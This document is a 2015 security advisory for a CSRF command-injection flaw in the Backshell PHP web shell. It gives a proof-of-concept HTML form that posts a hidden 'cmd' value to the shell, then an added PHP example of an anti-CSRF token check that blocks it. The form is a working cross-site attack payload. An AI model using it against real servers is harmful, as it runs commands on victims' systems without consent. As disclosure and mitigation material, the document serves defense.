Backshell Web Shell Cross Site Request Forgery
Posted on 27 December 2015
================================================================================
# Backshell Web Shell - CSRF Command Injection
================================================================================
# Vendor Homepage: https://github.com/neitanod/backshell
# Date: 25/12/2015
# Software Link: https://github.com/neitanod/backshell/archive/master.zip
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/bshell-csrf-rce.txt
================================================================================
# Exploit :

<form action="http://localhost/a/bshell.php" method="post">
  <input type="hidden" name="cmd" value="mkdir ehsan">
  <input type="submit" value="submit">
</form>

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================
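
The proof-of-concept form works because the handler accepts a POST carrying `cmd` from any origin. The following is an added example of a per-session anti-CSRF token check for such a handler; it is not Backshell's code, and the `csrf_token` field name, the use of PHP sessions and the helper function names are assumptions.

```php
<?php
// Added example, not Backshell's code: hypothetical guard for a POST handler
// that accepts a `cmd` field, as the proof-of-concept form targets.
declare(strict_types=1);

// SameSite=Strict keeps the session cookie off cross-site form posts (PHP >= 7.3).
session_set_cookie_params(['samesite' => 'Strict', 'httponly' => true]);
session_start();

// Issue one random token per session; only pages served by this app can read it.
function csrf_token(): string
{
    if (empty($_SESSION['csrf_token'])) {
        $_SESSION['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf_token'];
}

// True only when the submitted token matches the one stored in the session.
function csrf_request_is_valid(array $post, array $session): bool
{
    $sent     = $post['csrf_token'] ?? '';
    $expected = $session['csrf_token'] ?? '';
    return is_string($sent) && is_string($expected) && $expected !== ''
        && hash_equals($expected, $sent); // constant-time comparison
}

if (($_SERVER['REQUEST_METHOD'] ?? '') === 'POST') {
    if (!csrf_request_is_valid($_POST, $_SESSION)) {
        // A form hosted on another site cannot know the token, so it stops here.
        http_response_code(403);
        exit('Request rejected: missing or invalid CSRF token');
    }
    // ... the handler's existing processing of $_POST['cmd'] would run here ...
}
?>
<form method="post">
  <input type="hidden" name="csrf_token"
         value="<?= htmlspecialchars(csrf_token(), ENT_QUOTES) ?>">
  <input type="text" name="cmd">
  <input type="submit" value="submit">
</form>
```

The form from the advisory carries no `csrf_token` field, so this check answers it with HTTP 403 before `cmd` is read.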